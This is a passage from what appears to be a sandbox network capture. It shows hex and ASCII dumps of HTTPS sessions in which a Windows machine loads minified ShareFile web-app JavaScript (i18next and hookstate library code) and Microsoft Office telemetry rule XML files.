                                                                                                                                                                                                                                                                                Data Ascii: (t);var s=k(this.data,a)||{};r?C(s,n,o):s=R(R({},s),n),I(this.data,a,s),i.silent||this.emit("added",e,t,n)}},{key:"removeResourceBundle",value:function(e,t){this.hasResourceBundle(e,t)&&delete this.data[e][t],this.removeNamespaces(t),this.emit("removed",e
                                                                                                                                                                                                                                                                                2024-10-09 18:05:16 UTC16384INData Raw: 65 25 31 30 3e 3d 32 26 26 65 25 31 30 3c 3d 34 26 26 28 65 25 31 30 30 3c 31 30 7c 7c 65 25 31 30 30 3e 3d 32 30 29 3f 31 3a 32 29 7d 2c 35 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 20 4e 75 6d 62 65 72 28 30 3d 3d 65 3f 30 3a 31 3d 3d 65 3f 31 3a 32 3d 3d 65 3f 32 3a 65 25 31 30 30 3e 3d 33 26 26 65 25 31 30 30 3c 3d 31 30 3f 33 3a 65 25 31 30 30 3e 3d 31 31 3f 34 3a 35 29 7d 2c 36 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 20 4e 75 6d 62 65 72 28 31 3d 3d 65 3f 30 3a 65 3e 3d 32 26 26 65 3c 3d 34 3f 31 3a 32 29 7d 2c 37 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 20 4e 75 6d 62 65 72 28 31 3d 3d 65 3f 30 3a 65 25 31 30 3e 3d 32 26 26 65 25 31 30 3c 3d 34 26 26 28 65 25 31 30 30 3c 31 30 7c 7c 65 25 31 30 30 3e
                                                                                                                                                                                                                                                                                Data Ascii: e%10>=2&&e%10<=4&&(e%100<10||e%100>=20)?1:2)},5:function(e){return Number(0==e?0:1==e?1:2==e?2:e%100>=3&&e%100<=10?3:e%100>=11?4:5)},6:function(e){return Number(1==e?0:e>=2&&e<=4?1:2)},7:function(e){return Number(1==e?0:e%10>=2&&e%10<=4&&(e%100<10||e%100>
                                                                                                                                                                                                                                                                                2024-10-09 18:05:16 UTC16384INData Raw: 69 73 2e 70 72 65 70 61 72 65 4c 6f 61 64 69 6e 67 28 65 2c 74 2c 7b 72 65 6c 6f 61 64 3a 21 30 7d 2c 6e 29 7d 7d 2c 7b 6b 65 79 3a 22 6c 6f 61 64 4f 6e 65 22 2c 76 61 6c 75 65 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 74 3d 74 68 69 73 2c 6e 3d 61 72 67 75 6d 65 6e 74 73 2e 6c 65 6e 67 74 68 3e 31 26 26 61 72 67 75 6d 65 6e 74 73 5b 31 5d 21 3d 3d 75 6e 64 65 66 69 6e 65 64 3f 61 72 67 75 6d 65 6e 74 73 5b 31 5d 3a 22 22 2c 72 3d 65 2e 73 70 6c 69 74 28 22 7c 22 29 2c 6f 3d 72 5b 30 5d 2c 69 3d 72 5b 31 5d 3b 74 68 69 73 2e 72 65 61 64 28 6f 2c 69 2c 22 72 65 61 64 22 2c 75 6e 64 65 66 69 6e 65 64 2c 75 6e 64 65 66 69 6e 65 64 2c 28 66 75 6e 63 74 69 6f 6e 28 72 2c 61 29 7b 72 26 26 74 2e 6c 6f 67 67 65 72 2e 77 61 72 6e 28 22 22 2e 63 6f 6e 63
                                                                                                                                                                                                                                                                                Data Ascii: is.prepareLoading(e,t,{reload:!0},n)}},{key:"loadOne",value:function(e){var t=this,n=arguments.length>1&&arguments[1]!==undefined?arguments[1]:"",r=e.split("|"),o=r[0],i=r[1];this.read(o,i,"read",undefined,undefined,(function(r,a){r&&t.logger.warn("".conc
                                                                                                                                                                                                                                                                                2024-10-09 18:05:16 UTC16384INData Raw: 65 2c 6e 2c 7b 63 6f 6e 66 69 67 75 72 61 62 6c 65 3a 21 31 2c 65 6e 75 6d 65 72 61 62 6c 65 3a 21 30 2c 67 65 74 3a 72 7d 29 7d 2c 74 2e 6e 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 6e 3d 65 26 26 65 2e 5f 5f 65 73 4d 6f 64 75 6c 65 3f 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 65 5b 22 64 65 66 61 75 6c 74 22 5d 7d 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 65 7d 3b 72 65 74 75 72 6e 20 74 2e 64 28 6e 2c 22 61 22 2c 6e 29 2c 6e 7d 2c 74 2e 6f 3d 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 72 65 74 75 72 6e 20 4f 62 6a 65 63 74 2e 70 72 6f 74 6f 74 79 70 65 2e 68 61 73 4f 77 6e 50 72 6f 70 65 72 74 79 2e 63 61 6c 6c 28 65 2c 74 29 7d 2c 74 2e 70 3d 22 22 2c 74 28 74 2e 73 3d 31 29 7d 28 5b 66 75 6e 63 74 69 6f 6e 28 65 2c
                                                                                                                                                                                                                                                                                Data Ascii: e,n,{configurable:!1,enumerable:!0,get:r})},t.n=function(e){var n=e&&e.__esModule?function(){return e["default"]}:function(){return e};return t.d(n,"a",n),n},t.o=function(e,t){return Object.prototype.hasOwnProperty.call(e,t)},t.p="",t(t.s=1)}([function(e,
                                                                                                                                                                                                                                                                                2024-10-09 18:05:16 UTC16384INData Raw: 69 7a 65 7c 73 69 7a 65 73 7c 73 6c 6f 74 7c 73 70 61 6e 7c 73 70 65 6c 6c 43 68 65 63 6b 7c 73 72 63 7c 73 72 63 44 6f 63 7c 73 72 63 4c 61 6e 67 7c 73 72 63 53 65 74 7c 73 74 61 72 74 7c 73 74 65 70 7c 73 74 79 6c 65 7c 73 75 6d 6d 61 72 79 7c 74 61 62 49 6e 64 65 78 7c 74 61 72 67 65 74 7c 74 69 74 6c 65 7c 74 72 61 6e 73 6c 61 74 65 7c 74 79 70 65 7c 75 73 65 4d 61 70 7c 76 61 6c 75 65 7c 77 69 64 74 68 7c 77 6d 6f 64 65 7c 77 72 61 70 7c 61 62 6f 75 74 7c 64 61 74 61 74 79 70 65 7c 69 6e 6c 69 73 74 7c 70 72 65 66 69 78 7c 70 72 6f 70 65 72 74 79 7c 72 65 73 6f 75 72 63 65 7c 74 79 70 65 6f 66 7c 76 6f 63 61 62 7c 61 75 74 6f 43 61 70 69 74 61 6c 69 7a 65 7c 61 75 74 6f 43 6f 72 72 65 63 74 7c 61 75 74 6f 53 61 76 65 7c 63 6f 6c 6f 72 7c 69 6e 63 72
                                                                                                                                                                                                                                                                                Data Ascii: ize|sizes|slot|span|spellCheck|src|srcDoc|srcLang|srcSet|start|step|style|summary|tabIndex|target|title|translate|type|useMap|value|width|wmode|wrap|about|datatype|inlist|prefix|property|resource|typeof|vocab|autoCapitalize|autoCorrect|autoSave|color|incr
                                                                                                                                                                                                                                                                                2024-10-09 18:05:16 UTC16384INData Raw: 3d 6c 2e 73 74 61 74 65 2e 73 65 6c 66 28 29 3b 66 6f 72 28 76 61 72 20 66 3d 30 3b 66 3c 6e 2e 70 61 74 68 2e 6c 65 6e 67 74 68 3b 66 2b 3d 31 29 63 3d 63 2e 6e 65 73 74 65 64 28 6e 2e 70 61 74 68 5b 66 5d 29 3b 72 65 74 75 72 6e 20 6c 5b 22 5b 68 6f 6f 6b 73 74 61 74 65 28 67 6c 6f 62 61 6c 29 5d 22 5d 3d 63 2c 63 7d 6f 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 74 3d 53 28 65 29 2c 6e 3d 6e 65 77 20 45 28 74 2c 62 2c 74 2e 67 65 74 28 62 29 2c 74 2e 65 64 69 74 69 6f 6e 2c 28 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 76 28 7b 73 74 6f 72 65 3a 74 2c 73 74 61 74 65 3a 6e 7d 29 7d 29 29 3b 72 65 74 75 72 6e 7b 73 74 6f 72 65 3a 74 2c 73 74 61 74 65 3a 6e 7d 7d 3b 76 61 72 20 70 3d 72 5b 22 64 65 66 61 75 6c 74 22 5d 2e 75 73 65 53 74 61
                                                                                                                                                                                                                                                                                Data Ascii: =l.state.self();for(var f=0;f<n.path.length;f+=1)c=c.nested(n.path[f]);return l["[hookstate(global)]"]=c,c}o=function(){var t=S(e),n=new E(t,b,t.get(b),t.edition,(function(){return v({store:t,state:n})}));return{store:t,state:n}};var p=r["default"].useSta
                                                                                                                                                                                                                                                                                2024-10-09 18:05:16 UTC2804INData Raw: 62 6c 65 3a 21 30 2c 65 6e 75 6d 65 72 61 62 6c 65 3a 21 30 2c 67 65 74 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 6e 28 7b 73 74 65 61 6c 74 68 3a 21 30 7d 29 7d 2c 73 65 74 3a 75 6e 64 65 66 69 6e 65 64 7d 3a 22 70 61 74 68 22 3d 3d 3d 6f 3f 7b 63 6f 6e 66 69 67 75 72 61 62 6c 65 3a 21 30 2c 65 6e 75 6d 65 72 61 62 6c 65 3a 21 30 2c 67 65 74 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 65 7d 2c 73 65 74 3a 75 6e 64 65 66 69 6e 65 64 7d 3a 75 6e 64 65 66 69 6e 65 64 7d 2c 68 61 73 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 69 66 28 22 73 79 6d 62 6f 6c 22 3d 3d 74 79 70 65 6f 66 20 74 29 72 65 74 75 72 6e 21 31 3b 76 61 72 20 72 3d 6e 28 29 3b 72 65 74 75 72 6e 20 4f 62 6a 65 63 74 28 72 29 3d 3d 3d 72 3f 74 20 69 6e 20 72 3a
                                                                                                                                                                                                                                                                                Data Ascii: ble:!0,enumerable:!0,get:function(){return n({stealth:!0})},set:undefined}:"path"===o?{configurable:!0,enumerable:!0,get:function(){return e},set:undefined}:undefined},has:function(e,t){if("symbol"==typeof t)return!1;var r=n();return Object(r)===r?t in r:


                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                74192.168.2.64980313.107.246.45443
                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                2024-10-09 18:05:16 UTC192OUTGET /rules/rule120618v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                                                                Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                2024-10-09 18:05:16 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                Date: Wed, 09 Oct 2024 18:05:16 GMT
                                                                                                                                                                                                                                                                                Content-Type: text/xml
                                                                                                                                                                                                                                                                                Content-Length: 486
                                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                                Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                Last-Modified: Tue, 09 Apr 2024 00:25:30 GMT
                                                                                                                                                                                                                                                                                ETag: "0x8DC582B9018290B"
                                                                                                                                                                                                                                                                                x-ms-request-id: 0f93c021-e01e-0020-05fb-19de90000000
                                                                                                                                                                                                                                                                                x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                x-azure-ref: 20241009T180516Z-185b7d577bdt2k4f7f9nr1pp7s00000000yg00000000ry8a
                                                                                                                                                                                                                                                                                x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                2024-10-09 18:05:16 UTC486INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 38 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                                                                                                                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120618" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120617" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                75192.168.2.64980413.107.246.45443
                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                2024-10-09 18:05:16 UTC192OUTGET /rules/rule120619v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                                                                Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                2024-10-09 18:05:16 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                Date: Wed, 09 Oct 2024 18:05:16 GMT
                                                                                                                                                                                                                                                                                Content-Type: text/xml
                                                                                                                                                                                                                                                                                Content-Length: 407
                                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                                Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                Last-Modified: Tue, 09 Apr 2024 00:25:41 GMT
                                                                                                                                                                                                                                                                                ETag: "0x8DC582B9698189B"
                                                                                                                                                                                                                                                                                x-ms-request-id: 35b61c96-e01e-0052-1103-1ad9df000000
                                                                                                                                                                                                                                                                                x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                x-azure-ref: 20241009T180516Z-185b7d577bdxdkz6n7f63e38800000000100000000017zgd
                                                                                                                                                                                                                                                                                x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                2024-10-09 18:05:16 UTC407INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 39 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 41 61 5d 5b 43 63 5d 5b 45 65 5d 5b 52 72 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 65 22 3e 0d 0a 20 20 20
                                                                                                                                                                                                                                                                                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120619" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120617" /> <SR T="2" R="([Aa][Cc][Ee][Rr])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true">


                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                76192.168.2.64979913.224.189.1094432612C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                2024-10-09 18:05:16 UTC598OUTGET /sharefile-web/sharefiledev-package-pilet/0.37.12/package/dist/index.js HTTP/1.1
                                                                                                                                                                                                                                                                                Host: piletfeed-cdn.sharefile.io
                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                                Origin: https://premierbb.sharefile.com
                                                                                                                                                                                                                                                                                sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                                                                Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                                                Sec-Fetch-Dest: script
                                                                                                                                                                                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                2024-10-09 18:05:17 UTC611INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                Content-Type: application/x-javascript
                                                                                                                                                                                                                                                                                Content-Length: 226377
                                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                                Last-Modified: Wed, 02 Oct 2024 12:23:36 GMT
                                                                                                                                                                                                                                                                                x-amz-server-side-encryption: AES256
                                                                                                                                                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                Server: AmazonS3
                                                                                                                                                                                                                                                                                Date: Wed, 09 Oct 2024 05:19:02 GMT
                                                                                                                                                                                                                                                                                ETag: "68b7d9cc403c9d5ff3d0c1f9ea0182c2"
                                                                                                                                                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                X-Cache: Hit from cloudfront
                                                                                                                                                                                                                                                                                Via: 1.1 e86025dac63232624d2273c5fd256ce4.cloudfront.net (CloudFront)
                                                                                                                                                                                                                                                                                X-Amz-Cf-Pop: FRA2-C1
                                                                                                                                                                                                                                                                                X-Amz-Cf-Id: f4q0fngiEPdwYWytzSx8hnY63tvzOI0E6gietpj-drsYl4GZn-oAzQ==
                                                                                                                                                                                                                                                                                Age: 45975
                                                                                                                                                                                                                                                                                Access-Control-Allow-Origin: https://premierbb.sharefile.com
                                                                                                                                                                                                                                                                                Vary: Origin
                                                                                                                                                                                                                                                                                2024-10-09 18:05:17 UTC15773INData Raw: 2f 2f 40 70 69 6c 65 74 20 76 3a 32 28 77 65 62 70 61 63 6b 43 68 75 6e 6b 70 72 5f 73 68 61 72 65 66 69 6c 65 64 65 76 70 61 63 6b 61 67 65 70 69 6c 65 74 2c 7b 7d 29 0a 53 79 73 74 65 6d 2e 72 65 67 69 73 74 65 72 28 5b 22 40 63 69 74 72 69 74 65 2f 73 66 2d 61 70 69 22 2c 22 40 73 68 61 72 65 66 69 6c 65 64 65 76 2f 61 6e 74 64 2d 63 6f 6e 66 69 67 22 2c 22 61 6e 74 64 22 2c 22 72 65 61 63 74 22 2c 22 74 73 6c 69 62 22 5d 2c 28 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 76 61 72 20 72 3d 7b 7d 2c 6e 3d 7b 7d 2c 69 3d 7b 7d 2c 6f 3d 7b 7d 2c 61 3d 7b 7d 3b 72 65 74 75 72 6e 20 4f 62 6a 65 63 74 2e 64 65 66 69 6e 65 50 72 6f 70 65 72 74 79 28 69 2c 22 5f 5f 65 73 4d 6f 64 75 6c 65 22 2c 7b 76 61 6c 75 65 3a 21 30 7d 29 2c 4f 62 6a 65 63 74 2e 64 65 66 69
                                                                                                                                                                                                                                                                                Data Ascii: //@pilet v:2(webpackChunkpr_sharefiledevpackagepilet,{})System.register(["@citrite/sf-api","@sharefiledev/antd-config","antd","react","tslib"],(function(e,t){var r={},n={},i={},o={},a={};return Object.defineProperty(i,"__esModule",{value:!0}),Object.defi
                                                                                                                                                                                                                                                                                2024-10-09 18:05:17 UTC16384INData Raw: 31 2c 54 3d 5b 22 20 22 2c 22 2c 22 2c 22 3f 22 2c 22 21 22 2c 22 3b 22 5d 3b 66 75 6e 63 74 69 6f 6e 20 71 28 65 2c 74 29 7b 76 61 72 20 72 3d 4f 62 6a 65 63 74 2e 6b 65 79 73 28 65 29 3b 69 66 28 4f 62 6a 65 63 74 2e 67 65 74 4f 77 6e 50 72 6f 70 65 72 74 79 53 79 6d 62 6f 6c 73 29 7b 76 61 72 20 6e 3d 4f 62 6a 65 63 74 2e 67 65 74 4f 77 6e 50 72 6f 70 65 72 74 79 53 79 6d 62 6f 6c 73 28 65 29 3b 74 26 26 28 6e 3d 6e 2e 66 69 6c 74 65 72 28 28 66 75 6e 63 74 69 6f 6e 28 74 29 7b 72 65 74 75 72 6e 20 4f 62 6a 65 63 74 2e 67 65 74 4f 77 6e 50 72 6f 70 65 72 74 79 44 65 73 63 72 69 70 74 6f 72 28 65 2c 74 29 2e 65 6e 75 6d 65 72 61 62 6c 65 7d 29 29 29 2c 72 2e 70 75 73 68 2e 61 70 70 6c 79 28 72 2c 6e 29 7d 72 65 74 75 72 6e 20 72 7d 66 75 6e 63 74 69 6f
                                                                                                                                                                                                                                                                                Data Ascii: 1,T=[" ",",","?","!",";"];function q(e,t){var r=Object.keys(e);if(Object.getOwnPropertySymbols){var n=Object.getOwnPropertySymbols(e);t&&(n=n.filter((function(t){return Object.getOwnPropertyDescriptor(e,t).enumerable}))),r.push.apply(r,n)}return r}functio
                                                                                                                                                                                                                                                                                2024-10-09 18:05:17 UTC16384INData Raw: 7c 7c 74 68 69 73 2e 73 75 70 70 6f 72 74 65 64 4c 6e 67 73 2e 69 6e 64 65 78 4f 66 28 65 29 3e 2d 31 7d 7d 2c 7b 6b 65 79 3a 22 67 65 74 42 65 73 74 4d 61 74 63 68 46 72 6f 6d 43 6f 64 65 73 22 2c 76 61 6c 75 65 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 74 2c 72 3d 74 68 69 73 3b 72 65 74 75 72 6e 20 65 3f 28 65 2e 66 6f 72 45 61 63 68 28 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 69 66 28 21 74 29 7b 76 61 72 20 6e 3d 72 2e 66 6f 72 6d 61 74 4c 61 6e 67 75 61 67 65 43 6f 64 65 28 65 29 3b 72 2e 6f 70 74 69 6f 6e 73 2e 73 75 70 70 6f 72 74 65 64 4c 6e 67 73 26 26 21 72 2e 69 73 53 75 70 70 6f 72 74 65 64 43 6f 64 65 28 6e 29 7c 7c 28 74 3d 6e 29 7d 7d 29 29 2c 21 74 26 26 74 68 69 73 2e 6f 70 74 69 6f 6e 73 2e 73 75 70 70 6f 72 74 65 64 4c 6e 67 73
                                                                                                                                                                                                                                                                                Data Ascii: ||this.supportedLngs.indexOf(e)>-1}},{key:"getBestMatchFromCodes",value:function(e){var t,r=this;return e?(e.forEach((function(e){if(!t){var n=r.formatLanguageCode(e);r.options.supportedLngs&&!r.isSupportedCode(n)||(t=n)}})),!t&&this.options.supportedLngs
                                                                                                                                                                                                                                                                                2024-10-09 18:05:17 UTC15419INData Raw: 61 72 61 6c 6c 65 6c 52 65 61 64 73 7c 7c 31 30 2c 6f 2e 72 65 61 64 69 6e 67 43 61 6c 6c 73 3d 30 2c 6f 2e 6d 61 78 52 65 74 72 69 65 73 3d 73 2e 6d 61 78 52 65 74 72 69 65 73 3e 3d 30 3f 73 2e 6d 61 78 52 65 74 72 69 65 73 3a 35 2c 6f 2e 72 65 74 72 79 54 69 6d 65 6f 75 74 3d 73 2e 72 65 74 72 79 54 69 6d 65 6f 75 74 3e 3d 31 3f 73 2e 72 65 74 72 79 54 69 6d 65 6f 75 74 3a 33 35 30 2c 6f 2e 73 74 61 74 65 3d 7b 7d 2c 6f 2e 71 75 65 75 65 3d 5b 5d 2c 6f 2e 62 61 63 6b 65 6e 64 26 26 6f 2e 62 61 63 6b 65 6e 64 2e 69 6e 69 74 26 26 6f 2e 62 61 63 6b 65 6e 64 2e 69 6e 69 74 28 69 2c 73 2e 62 61 63 6b 65 6e 64 2c 73 29 2c 6f 7d 72 65 74 75 72 6e 28 30 2c 73 2e 41 29 28 72 2c 5b 7b 6b 65 79 3a 22 71 75 65 75 65 4c 6f 61 64 22 2c 76 61 6c 75 65 3a 66 75 6e 63
                                                                                                                                                                                                                                                                                Data Ascii: arallelReads||10,o.readingCalls=0,o.maxRetries=s.maxRetries>=0?s.maxRetries:5,o.retryTimeout=s.retryTimeout>=1?s.retryTimeout:350,o.state={},o.queue=[],o.backend&&o.backend.init&&o.backend.init(i,s.backend,s),o}return(0,s.A)(r,[{key:"queueLoad",value:func
                                                                                                                                                                                                                                                                                2024-10-09 18:05:17 UTC392INData Raw: 21 61 28 6e 2c 65 29 7c 7c 69 26 26 21 61 28 6f 2c 65 29 29 29 7d 7d 2c 7b 6b 65 79 3a 22 6c 6f 61 64 4e 61 6d 65 73 70 61 63 65 73 22 2c 76 61 6c 75 65 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 76 61 72 20 72 3d 74 68 69 73 2c 6e 3d 53 28 29 3b 72 65 74 75 72 6e 20 74 68 69 73 2e 6f 70 74 69 6f 6e 73 2e 6e 73 3f 28 22 73 74 72 69 6e 67 22 3d 3d 74 79 70 65 6f 66 20 65 26 26 28 65 3d 5b 65 5d 29 2c 65 2e 66 6f 72 45 61 63 68 28 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 2e 6f 70 74 69 6f 6e 73 2e 6e 73 2e 69 6e 64 65 78 4f 66 28 65 29 3c 30 26 26 72 2e 6f 70 74 69 6f 6e 73 2e 6e 73 2e 70 75 73 68 28 65 29 7d 29 29 2c 74 68 69 73 2e 6c 6f 61 64 52 65 73 6f 75 72 63 65 73 28 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 6e 2e 72 65 73 6f 6c 76 65 28 29 2c 74 26
                                                                                                                                                                                                                                                                                Data Ascii: !a(n,e)||i&&!a(o,e)))}},{key:"loadNamespaces",value:function(e,t){var r=this,n=S();return this.options.ns?("string"==typeof e&&(e=[e]),e.forEach((function(e){r.options.ns.indexOf(e)<0&&r.options.ns.push(e)})),this.loadResources((function(e){n.resolve(),t&
                                                                                                                                                                                                                                                                                2024-10-09 18:05:17 UTC16384INData Raw: 73 2e 70 72 65 6c 6f 61 64 7c 7c 5b 5d 2c 69 3d 65 2e 66 69 6c 74 65 72 28 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 20 6e 2e 69 6e 64 65 78 4f 66 28 65 29 3c 30 7d 29 29 3b 72 65 74 75 72 6e 20 69 2e 6c 65 6e 67 74 68 3f 28 74 68 69 73 2e 6f 70 74 69 6f 6e 73 2e 70 72 65 6c 6f 61 64 3d 6e 2e 63 6f 6e 63 61 74 28 69 29 2c 74 68 69 73 2e 6c 6f 61 64 52 65 73 6f 75 72 63 65 73 28 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 2e 72 65 73 6f 6c 76 65 28 29 2c 74 26 26 74 28 65 29 7d 29 29 2c 72 29 3a 28 74 26 26 74 28 29 2c 50 72 6f 6d 69 73 65 2e 72 65 73 6f 6c 76 65 28 29 29 7d 7d 2c 7b 6b 65 79 3a 22 64 69 72 22 2c 76 61 6c 75 65 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 69 66 28 65 7c 7c 28 65 3d 74 68 69 73 2e 72 65 73 6f 6c 76 65 64 4c 61 6e 67
                                                                                                                                                                                                                                                                                Data Ascii: s.preload||[],i=e.filter((function(e){return n.indexOf(e)<0}));return i.length?(this.options.preload=n.concat(i),this.loadResources((function(e){r.resolve(),t&&t(e)})),r):(t&&t(),Promise.resolve())}},{key:"dir",value:function(e){if(e||(e=this.resolvedLang
